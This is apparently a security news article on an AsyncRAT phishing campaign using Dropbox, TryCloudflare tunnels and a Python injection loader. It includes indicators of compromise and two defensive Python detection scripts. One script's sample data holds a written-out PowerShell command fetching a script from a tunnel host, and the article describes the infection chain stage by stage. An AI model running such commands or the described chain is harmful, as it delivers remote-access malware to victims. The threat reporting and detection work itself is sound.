AsyncRAT Campaign Uses TryCloudflare Tunnels and Python Loaders to Deliver Malware
An AsyncRAT malware campaign is using invoice-themed phishing emails, Dropbox downloads, TryCloudflare tunnels, shortcut files, PowerShell, JavaScript, batch scripts, and Python loaders to infect Windows systems. The goal is to install remote access malware while hiding the attack behind trusted cloud services and a fake invoice PDF.
The campaign does not rely on a single suspicious malware host. It moves through several stages, starting with a Dropbox-hosted ZIP file and then switching to temporary TryCloudflare infrastructure for additional payloads. This gives attackers disposable infrastructure that can be created and abandoned quickly.
A Forcepoint X-Labs analysis found that the infection chain ultimately uses a Python script named load.py and five binary files to inject malware into legitimate Windows processes. The final payloads include AsyncRAT, while some branches also deliver VenomRAT and XWorm.
How the AsyncRAT Campaign Starts
The attack begins with a phishing email that looks like an invoice notice. In the sample analyzed by researchers, a German-language button labeled "Rechnung herunterladen," meaning "download invoice," hid a Dropbox link that delivered the first ZIP archive.
Inside the ZIP file, attackers placed an internet shortcut file. When opened, that shortcut connected to a TryCloudflare-hosted WebDAV location and retrieved an LNK file, which then launched PowerShell to pull a JavaScript file from the same tunnel.
Cloudflare says TryCloudflare quick tunnels let developers test Cloudflare Tunnel without adding a site to Cloudflare DNS. Attackers abuse that convenience because a random trycloudflare.com subdomain can look less suspicious than an unknown standalone domain.
Attack Chain at a Glance
| Stage | File or service | Purpose |
|---|---|---|
| 1. Phishing lure | Invoice email | Tricks the user into clicking a download button. |
| 2. Initial download | Dropbox ZIP file | Delivers the first archive with an internet shortcut. |
| 3. Redirection | .URL file | Connects to a TryCloudflare WebDAV path. |
| 4. Execution | LNK and PowerShell | Downloads a JavaScript file from the same tunnel. |
| 5. Dropper | JavaScript and BAT file | Downloads the Python package and opens a decoy PDF. |
| 6. Loader | load.py and BIN files | Injects RAT payloads into legitimate Windows processes. |
The JavaScript stage retrieves an obfuscated batch file. That batch file carries out the main setup work by opening a fake invoice PDF for distraction, downloading a second ZIP archive, extracting it, checking whether Python is available, and running the Python loader.
The campaign's use of a visible PDF matters because it reduces suspicion. The victim sees a document open after clicking the invoice link, while the real infection chain continues in the background.
Python Loader Runs the Final Payload
The second ZIP file contains many files that look like ordinary Python setup components. Forcepoint found that only load.py and five BIN files were malicious, which helps bury the important payloads inside a larger folder structure.
The loader uses Python ctypes, a standard library module that can call functions from DLLs and shared libraries. In this case, the script uses Windows API calls for memory allocation, memory copying, thread creation, and execution control.
The malware then uses APC injection to run shellcode inside other processes. Forcepoint described this as Early Bird APC Queue injection because the code gets placed into a new process before the main thread begins normal execution.
Payloads Include AsyncRAT, VenomRAT and XWorm
Different BIN files lead to different malware payloads. One file injects VenomRAT into notepad.exe, another injects XWorm, and the remaining files inject AsyncRAT shellcode into explorer.exe.
AsyncRAT gives attackers remote control over infected devices and can support spying, command execution, credential theft, and data collection. VenomRAT and XWorm offer similar remote access and information theft capabilities, which makes the campaign useful for broader cybercrime activity.

The payloads communicate with the same command-and-control infrastructure over different ports, including traffic to 62.60.190[.]141 on ports 3232 and 4056. A second server, 62.60.190[.]196, also appeared in the published indicators.
Why TryCloudflare Abuse Keeps Appearing
This campaign fits a broader trend of attackers abusing trusted tunneling and cloud services. Proofpoint research previously tracked financially motivated campaigns that abused Cloudflare Tunnels to deliver remote access trojans, including XWorm, AsyncRAT, VenomRAT, GuLoader, and Remcos.
A related Trend Micro MDR report in January 2026 also described AsyncRAT activity that used Cloudflare free-tier infrastructure, Dropbox links, legitimate Python environments, and decoy PDF files to reduce detection.
Attackers benefit from this model because many defenders cannot simply block trusted services for every user. Instead, they need to inspect behavior, file types, command lines, and unusual connections that follow a click.
What Defenders Should Watch For
- Invoice-themed emails that link to Dropbox archives or other file-sharing services.
- ZIP files that contain .URL, .LNK, .JS, .BAT, .WSH, or double-extension files.
- PowerShell launched by shortcut files, script files, or Microsoft Office processes.
- Connections to random trycloudflare.com subdomains after an email click.
- Python folders dropped into temporary or user-writable directories.
- Explorer.exe or notepad.exe launching suspicious network traffic after script execution.
The Forcepoint report says customer protections covered several stages of the chain, including lure attachments, redirect URLs, dropper files, and call-home traffic. It also noted that Forcepoint NGFW can terminate LNK file transfers and suspicious PowerShell user-agent connections when inspection is enabled.
Defenders should combine gateway controls with endpoint logging. PowerShell logging, script block logging, command-line auditing, and detection for shortcut-file execution can reveal activity before the RAT finishes installation.
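As an added illustration of the watch list and the endpoint logging recommended above (example code written for this page, not Forcepoint's, Proofpoint's or Trend Micro's), the following Python scores simplified process-creation and network events against the stages of the chain and correlates them per host, so that explorer.exe or notepad.exe egress only counts once a script stage has already fired on the same machine. The event schema and field names, the user-writable path patterns, the three-stage alert threshold, the workstation names and every sample command line are assumptions constructed for the example; the only page values reused are the load.py file name and the C2 address from the published indicators.

```python
"""Behavioral detection for the delivery chain described in the article.

Added example, not vendor code. Events are constructed, simplified
process-creation and network records; map your EDR or Sysmon fields
(parent image, command line, destination) onto the Event class.
"""
import re
from dataclasses import dataclass

# File types the article flags inside mailed archives (assumed list).
RISKY_EXT = (".url", ".lnk", ".js", ".bat", ".wsh", ".cmd", ".vbs")
# Parents that should rarely spawn PowerShell: shell, script engines, Office.
SHORTCUT_HOSTS = {"explorer.exe", "wscript.exe", "cscript.exe", "cmd.exe",
                  "winword.exe", "excel.exe", "outlook.exe"}
TRYCLOUDFLARE = re.compile(r"\b[a-z0-9-]+\.trycloudflare\.com\b", re.I)
USER_WRITABLE = re.compile(r"\\(temp|appdata|downloads|public)\\", re.I)
ALERT_THRESHOLD = 3  # distinct stages on one host before calling it a chain (assumption)


@dataclass
class Event:
    host: str
    kind: str          # "process" or "network"
    image: str         # image name of the acting process
    parent: str = ""   # parent image (process events)
    cmdline: str = ""  # full command line (process events)
    dest: str = ""     # destination host or ip:port (network events)


def score_event(ev, prior):
    """Return the stage names this single event matches, given earlier hits on the host."""
    hits = []
    img, parent, cmd = ev.image.lower(), ev.parent.lower(), ev.cmdline.lower()
    if ev.kind == "process":
        if img == "powershell.exe" and parent in SHORTCUT_HOSTS:
            hits.append("powershell_from_shortcut_or_office")
        if any(ext in cmd for ext in RISKY_EXT) and USER_WRITABLE.search(cmd):
            hits.append("script_file_in_user_writable_path")
        if img in ("python.exe", "pythonw.exe") and USER_WRITABLE.search(cmd):
            hits.append("python_from_user_writable_path")
        if TRYCLOUDFLARE.search(cmd):
            hits.append("trycloudflare_in_cmdline")
    else:
        if TRYCLOUDFLARE.search(ev.dest):
            hits.append("trycloudflare_connection")
        # explorer/notepad talking out is only interesting after a script stage
        if img in ("explorer.exe", "notepad.exe") and prior:
            hits.append("egress_from_injected_host_process")
    return hits


def assess(events):
    """Group events by host; return {host: (ordered distinct hits, chain_detected)}."""
    seen = {}
    for ev in events:
        hits = seen.setdefault(ev.host, [])
        for h in score_event(ev, hits):
            if h not in hits:
                hits.append(h)
    return {host: (hits, len(hits) >= ALERT_THRESHOLD) for host, hits in seen.items()}


# Constructed events modelled on the chain in the article (ws01 infected, ws02 benign).
SAMPLE = [
    Event("ws01", "process", "powershell.exe", parent="explorer.exe",
          cmdline=r'powershell.exe -c "Invoke-WebRequest http://random-words-here.trycloudflare.com/inv.js '
                  r'-OutFile C:\Users\alice\AppData\Local\Temp\inv.js"'),
    Event("ws01", "network", "powershell.exe", dest="random-words-here.trycloudflare.com"),
    Event("ws01", "process", "python.exe", parent="cmd.exe",
          cmdline=r"C:\Users\alice\AppData\Local\Temp\ma\python.exe C:\Users\alice\AppData\Local\Temp\ma\load.py"),
    Event("ws01", "network", "explorer.exe", dest="62.60.190.141:4056"),
    Event("ws02", "process", "python.exe", parent="code.exe",
          cmdline=r"C:\Python312\python.exe C:\projects\app\main.py"),
    Event("ws02", "network", "explorer.exe", dest="fileserver.corp.example"),
]

if __name__ == "__main__":
    for host, (hits, chain) in assess(SAMPLE).items():
        print(host, "CHAIN" if chain else "ok", hits)
```

Each stage alone is noisy (developers run Python from temp folders, explorer.exe talks to file shares), which is why the verdict is per host and requires several distinct stages; the threshold and the path patterns are starting points to tune against your own baseline.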
Indicators of Compromise
The following indicators came from the public analysis and should support threat hunting. Teams should use them with behavior-based detections because tunnel domains and payload locations can change quickly.
| Type | Indicator | Description |
|---|---|---|
| Host | inventory-card-thumbzilla-ip[.]trycloudflare[.]com/DE/ | TryCloudflare location used to host the LNK stage |
| Host | mercy-synopsis-notify-motels[.]trycloudflare[.]com/ma[.]zip | TryCloudflare location used to deliver the Python package |
| Host | sufficiently-points-est-minimize[.]trycloudflare[.]com/ma[.]zip | Alternate TryCloudflare location for the Python package |
| C2 IP | 62.60.190[.]141 | Command-and-control server contacted over ports 3232 and 4056 |
| C2 IP | 62.60.190[.]196 | Secondary command-and-control server |
| File hash | 4747ee49bdf31351c025049d8c3b7fef831be77c | load.py Python loader |
| File hash | 0aa1b8fba8d7bd19a0064edfdf86c027da253644 | LNK file that triggers the PowerShell stage |
| File hash | cd61de9e4003ba568ae76f064935addb106a6d6d | Obfuscated batch file that downloads the Python package |
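The indicators in the table are defanged with "[.]" and two of the hosts carry a path, so they cannot be matched against logs as written. The following is an added example (not part of the Forcepoint analysis) that refangs them into a watchlist and sweeps log lines for DNS queries, firewall destinations and file hashes that match. The log format, workstation names, timestamps and the benign addresses are constructed for the example; the indicator values themselves are copied from the table above.

```python
"""Refang the article's indicators and hunt for them in constructed log lines.

Added example, not vendor code. Indicator strings are the page's values;
everything else (log format, hosts, timestamps) is made up for the demo.
"""
import re

# Defanged indicators as published (page values, not invented).
RAW_IOCS = {
    "host": [
        "inventory-card-thumbzilla-ip[.]trycloudflare[.]com/DE/",
        "mercy-synopsis-notify-motels[.]trycloudflare[.]com/ma[.]zip",
        "sufficiently-points-est-minimize[.]trycloudflare[.]com/ma[.]zip",
    ],
    "ip": ["62.60.190[.]141", "62.60.190[.]196"],
    "sha1": [
        "4747ee49bdf31351c025049d8c3b7fef831be77c",
        "0aa1b8fba8d7bd19a0064edfdf86c027da253644",
        "cd61de9e4003ba568ae76f064935addb106a6d6d",
    ],
}


def refang(value):
    """Turn 'a[.]b' back into 'a.b' so it can be compared with real log data."""
    return value.replace("[.]", ".")


def host_only(url_like):
    """Drop any path component so 'host/path' indicators match DNS and proxy logs."""
    return refang(url_like).split("/", 1)[0].lower()


def build_watchlist(raw):
    return {
        "hosts": {host_only(h) for h in raw["host"]},
        "ips": {refang(i) for i in raw["ip"]},
        "sha1": {s.lower() for s in raw["sha1"]},
    }


IP_RE = re.compile(r"\b\d{1,3}(?:\.\d{1,3}){3}\b")
HOST_RE = re.compile(r"\b[a-z0-9-]+(?:\.[a-z0-9-]+)+\b", re.I)
SHA1_RE = re.compile(r"\b[0-9a-f]{40}\b", re.I)


def match_line(line, wl):
    """Return (type, value) pairs for every watchlist entry found in one log line."""
    found = []
    for ip in IP_RE.findall(line):
        if ip in wl["ips"]:
            found.append(("ip", ip))
    for h in HOST_RE.findall(line):
        if h.lower() in wl["hosts"]:
            found.append(("host", h.lower()))
    for s in SHA1_RE.findall(line):
        if s.lower() in wl["sha1"]:
            found.append(("sha1", s.lower()))
    return found


def hunt(lines, wl):
    """Return [(line, matches)] for lines that contain at least one indicator."""
    return [(line, m) for line in lines if (m := match_line(line, wl))]


# Constructed log lines: one DNS query, one firewall record and one EDR file
# event from an infected host, plus benign traffic from a second host.
SAMPLE_LOGS = [
    "2026-01-14T09:02:11Z dns ws01 query=mercy-synopsis-notify-motels.trycloudflare.com type=A",
    "2026-01-14T09:02:13Z fw ws01 dst=62.60.190.141 dport=4056 proto=tcp action=allow",
    "2026-01-14T09:03:40Z edr ws01 file=C:\\Users\\alice\\AppData\\Local\\Temp\\ma\\load.py "
    "sha1=4747ee49bdf31351c025049d8c3b7fef831be77c",
    "2026-01-14T09:05:00Z dns ws02 query=www.example.com type=A",
    "2026-01-14T09:05:02Z fw ws02 dst=203.0.113.10 dport=443 proto=tcp action=allow",
]

if __name__ == "__main__":
    for line, matches in hunt(SAMPLE_LOGS, build_watchlist(RAW_IOCS)):
        print(matches, "<-", line)
```

Matching on the bare host name rather than the full URL is deliberate: a DNS or proxy log never shows the "/ma.zip" path, and tunnel operators rotate subdomains, so the host list should be treated as a short-lived supplement to the behavioral checks rather than the primary detection.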
How to Reduce Exposure
Organizations should block or detonate shortcut files and script files delivered through email or downloaded archives. They should also apply stricter inspection to file-sharing links when a message uses invoice, payment, purchase order, or delivery themes.

The Proofpoint findings show that many related campaigns use internet shortcut files, WebDAV, LNK or VBS files, BAT or CMD scripts, and Python installers. Blocking one stage may not stop every variant, so layered detection matters.
The Trend Micro analysis also shows why defenders should review Dropbox downloads, TryCloudflare connections, startup persistence, and script-driven Python execution together instead of treating each event as isolated.

Bottom Line
The campaign shows how attackers can turn everyday cloud and developer services into malware delivery infrastructure. Dropbox hosts the first archive, TryCloudflare serves later stages, Python runs the loader, and legitimate Windows processes hide the final payload.
For security teams, the most important signal is not just the domain name. The suspicious pattern comes from the chain of events: an invoice email, a compressed archive, a shortcut file, a script interpreter, PowerShell, a Python loader, and injected code.
The Cloudflare TryCloudflare documentation explains the legitimate purpose of quick tunnels, while the Python ctypes documentation and MITRE ATT&CK mapping help explain why the loader can interact with low-level Windows functions and inject code into other processes.
FAQ
It is a malware campaign that uses invoice phishing emails, Dropbox downloads, TryCloudflare tunnels, script files, and Python loaders to deliver AsyncRAT and other remote access trojans.
The attack starts with a phishing email that links to a Dropbox ZIP file. The ZIP contains an internet shortcut that connects to TryCloudflare infrastructure and starts the next malware stages.
Attackers use TryCloudflare tunnels because they provide temporary cloud-hosted subdomains that can appear more trustworthy than unknown malware servers and can be rotated quickly.
The Python loader runs load.py and processes several BIN files. It uses Windows API calls to place shellcode into legitimate processes such as explorer.exe and notepad.exe.
Organizations should monitor invoice-themed phishing, ZIP files with shortcut or script files, PowerShell launched from LNK files, random trycloudflare.com connections, suspicious Python execution, and unusual network traffic from explorer.exe or notepad.exe.